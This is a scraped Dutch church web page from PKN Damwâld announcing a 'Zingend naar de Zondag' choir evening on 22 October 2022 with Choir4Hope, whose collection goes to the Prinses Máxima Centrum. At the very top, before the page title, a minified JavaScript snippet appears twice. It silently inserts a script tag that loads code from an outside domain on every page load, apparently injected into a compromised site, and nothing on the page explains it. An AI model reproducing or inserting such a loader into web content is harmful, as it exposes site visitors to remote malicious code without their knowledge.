;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Zingend naar de Zondag ... vooraankondiging! - PKN Damwâld

Zingend naar de Zondag … vooraankondiging!

Gepubliceerd op: maandag 27 juni 2022

Na een stop van 2 ½ jaar door corona zijn wij van plan om weer te starten met Zingend naar de Zondag in het najaar van 2022. Op zaterdagavond 22 oktober komt het 100 leden tellende koor Choir4Hope uit Barneveld naar de Gereformeerde Kerk in Damwâld om het spits af te bijten. Het koor staat onder de bezielende en inspirerende leiding van Peter Overduin.
Het koor brak door in Nederland tijdens een uitzending van Hollands Got Talent en daarna was het koor ook regelmatig te zien bij Nederland Zingt van de E.O. Het koor zingt deze avond in Damwâld en de opbrengt van de collecte gaat in zijn geheel naar het Prinses Maxima Centrum voor de bestrijding van kinderkanker. Verder werken mee als solisten Annalies Schep en Sierk Krol.
De samenzang en het koor worden op het orgel begeleid door Jacob Schenk uit Urk en de presentatie is deze avond in handen van Jan van der Meer.
Kortom een avond die u niet mag missen en die u nu alvast kunt noteren in uw agenda.

Commissie Zingend naar de Zondag
Koop en Anneke Schaafsma
Kor en Willy Postma